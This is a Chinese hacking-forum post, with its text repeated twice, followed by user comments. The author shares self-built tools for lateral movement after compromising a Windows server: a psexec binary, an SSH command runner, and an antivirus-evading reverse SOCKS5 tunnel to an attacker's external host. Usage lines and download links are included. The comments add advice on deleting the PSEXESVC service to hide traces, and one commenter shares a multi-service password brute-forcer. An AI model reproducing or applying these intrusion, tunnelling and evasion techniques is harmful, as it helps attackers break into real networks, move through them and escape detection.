内网渗透几个小工具
好久没有发帖了,出来冒泡~
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
一)前言
昨天搞站,shell是windows的administrator权限,但是反弹不出来。所有东西全在命令行上面玩。
凤凰扫描器扫除几个smb和ssh的口令
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
二)小工具
1.psexec.exe
网上传的psexec 在命令行里执行smb命令会弹框框,导致shell卡死。像这样:
找到psexec.py 用pyinstaller转换为二进制文件:
usage:psexec.exe username:password@IP cmd
linux版本psexec等等也进行分享
-------------------------------------------------------------------------------------------------------
2.ssh_cmd.exe
自己用python写的,pyinstaller转换二进制文件:
usage: ssh_cmd.exe [-h] --ip IP --user USERNAME --pass PASSWORD [--port PORT]
[--cmd CMD]
ssh commands author: wilson
optional arguments:
-h, --help show this help message and exit
--ip IP ip
--user USERNAME username
--pass PASSWORD password
--port PORT port
--cmd CMD shell command
example:
ssh_cmd.exe --ip 192.168.159.1 --user root --pass 123456 --cmd "ls -al"
--------------------------------------------------------------------------------------------
3.ssock_win.exe
ssock再linux搭建一个socks5服务,非常好用~
详情看这里:http://www.freebuf.com/articles/system/12182.html
但是在windows下面,没有这个工具。
相似功能的有htran,昨天就想用htran,搭建socks5进内网。但是杀软屌得不行,htran被杀的很惨。。。。。
于是乎,我将s5.py和rtcp.py拼接一起~~写成了ssocks_win.py 代码有点长,直接给exe吧
usage: ssock_win.exe [-h] --lport LPORT --rhost RHOST --rport RPORT
just like ssock
optional arguments:
-h, --help show this help message and exit
--lport LPORT build socket5 in this port
--rhost RHOST connect this ip
--rport RPORT connect this port
--lport是本地开启socks5的端口
--rhost是有外网ip的服务器的地址
--rport是外网ip的服务器的端口
外网服务器可以用lcx -listen port1 port2 来接受,也可以用rtcp.py来监听。他们是一样
examp:
外网服务器:
lcx -listen port1 port2
内网服务器
ssock_win.exe --lport 10100 --rhost IP --rport port1
然后你用proxychains或者proxifer 连接IP and port2
----------------------------------------------------------------------------------------------
三)结语
文件看这里:
链接:http://pan.baidu.com/s/1qWLqC24 密码:jyur
1.路径带中文会报错的
2.因为是pyinstaller生成,文件都比较大
3.ssock_win.exe 发包不能太频繁,但是3389还是连的起来的~ 出错以后要重新运行
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
一)前言
昨天搞站,shell是windows的administrator权限,但是反弹不出来。所有东西全在命令行上面玩。
凤凰扫描器扫除几个smb和ssh的口令
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
二)小工具
1.psexec.exe
网上传的psexec 在命令行里执行smb命令会弹框框,导致shell卡死。像这样:
找到psexec.py 用pyinstaller转换为二进制文件:
usage:psexec.exe username:password@IP cmd
linux版本psexec等等也进行分享
-------------------------------------------------------------------------------------------------------
2.ssh_cmd.exe
自己用python写的,pyinstaller转换二进制文件:
usage: ssh_cmd.exe [-h] --ip IP --user USERNAME --pass PASSWORD [--port PORT]
[--cmd CMD]
ssh commands author: wilson
optional arguments:
-h, --help show this help message and exit
--ip IP ip
--user USERNAME username
--pass PASSWORD password
--port PORT port
--cmd CMD shell command
example:
ssh_cmd.exe --ip 192.168.159.1 --user root --pass 123456 --cmd "ls -al"
--------------------------------------------------------------------------------------------
3.ssock_win.exe
ssock再linux搭建一个socks5服务,非常好用~
详情看这里:http://www.freebuf.com/articles/system/12182.html
但是在windows下面,没有这个工具。
相似功能的有htran,昨天就想用htran,搭建socks5进内网。但是杀软屌得不行,htran被杀的很惨。。。。。
于是乎,我将s5.py和rtcp.py拼接一起~~写成了ssocks_win.py 代码有点长,直接给exe吧
usage: ssock_win.exe [-h] --lport LPORT --rhost RHOST --rport RPORT
just like ssock
optional arguments:
-h, --help show this help message and exit
--lport LPORT build socket5 in this port
--rhost RHOST connect this ip
--rport RPORT connect this port
--lport是本地开启socks5的端口
--rhost是有外网ip的服务器的地址
--rport是外网ip的服务器的端口
外网服务器可以用lcx -listen port1 port2 来接受,也可以用rtcp.py来监听。他们是一样
examp:
外网服务器:
lcx -listen port1 port2
内网服务器
ssock_win.exe --lport 10100 --rhost IP --rport port1
然后你用proxychains或者proxifer 连接IP and port2
----------------------------------------------------------------------------------------------
三)结语
文件看这里:
链接:http://pan.baidu.com/s/1qWLqC24 密码:jyur
1.路径带中文会报错的
2.因为是pyinstaller生成,文件都比较大
3.ssock_win.exe 发包不能太频繁,但是3389还是连的起来的~ 出错以后要重新运行
评论54次
自动接受"最终用户许可协议"的参数:-accesseula PsToolsxi列的小工具都可以带这个参数执行。
这个给力,不错
你就是那个burpsite群的大牛么~
出错了- -
我好着的撒,我给发qq吧 qq聊 方便
这个给力,不错
出错了- -
路径不带中文。。。。再cmd里面运行
还是一样啊- -
出错了- -
路径不带中文。。。。再cmd里面运行
出错了- -
匿了好久,更新了~ 链接:http://pan.baidu.com/s/1kTxetd9 密码:hz1w 谢谢支持~functions: mysql burp mssql burp ftp burp smb burp&&ms08067 check ssh burp web---->iisput check, tomcat burp,webdirscan vnc burp snmp burp pop burp rsync burp redis burp postgres burp ldap burp mongodb burp
好人啊,多谢多谢
喜欢自己动手丰衣足食的人~~
这几个工具都是挺实用的 。收下了先
psexecWin环境下还是原版好用,第一次运行时psexec /accepteula这样以后就不会弹框框了PSTools微软xi列的工具都挺好用,即兼容,又不杀运行完后记得删掉psexec添加的服务PSEXESRV别的小工具都挺不错的,谢谢分享
psexec /accepteula 不错,学到了
谢谢 支持
psexecWin环境下还是原版好用,第一次运行时psexec /accepteula这样以后就不会弹框框了PSTools微软xi列的工具都挺好用,即兼容,又不杀运行完后记得删掉psexec添加的服务PSEXESRV别的小工具都挺不错的,谢谢分享
为啥要删掉psexec添加的服务PSEXESRV
使用的时候会添加一次服务,清理是为了擦屁股,不然被爆。。。
我去了解一下ironpy~
匿了好久,更新了~ 链接:http://pan.baidu.com/s/1kTxetd9 密码:hz1w 谢谢支持~ functions: mysql burp mssql burp ftp burp smb burp&&ms08067 check ssh burp web---->iisput check, tomcat burp,webdirscan vnc burp snmp burp pop burp rsync burp redis burp postgres burp ldap burp mongodb burp
WMIEXEC不是更好么https://www.t00ls.com/viewthread.php?tid=21167
看了 确实更棒~
psexecWin环境下还是原版好用,第一次运行时psexec /accepteula这样以后就不会弹框框了PSTools微软xi列的工具都挺好用,即兼容,又不杀运行完后记得删掉psexec添加的服务PSEXESRV别的小工具都挺不错的,谢谢分享
为啥要删掉psexec添加的服务PSEXESRV
因为容易被懂安全的发现
psexec很容易退出失败的 慎用
私货放出来才是好东西
等了好久 作者终于发帖了 。。弱弱问句,凤凰还更新么 嘿嘿 等待好久了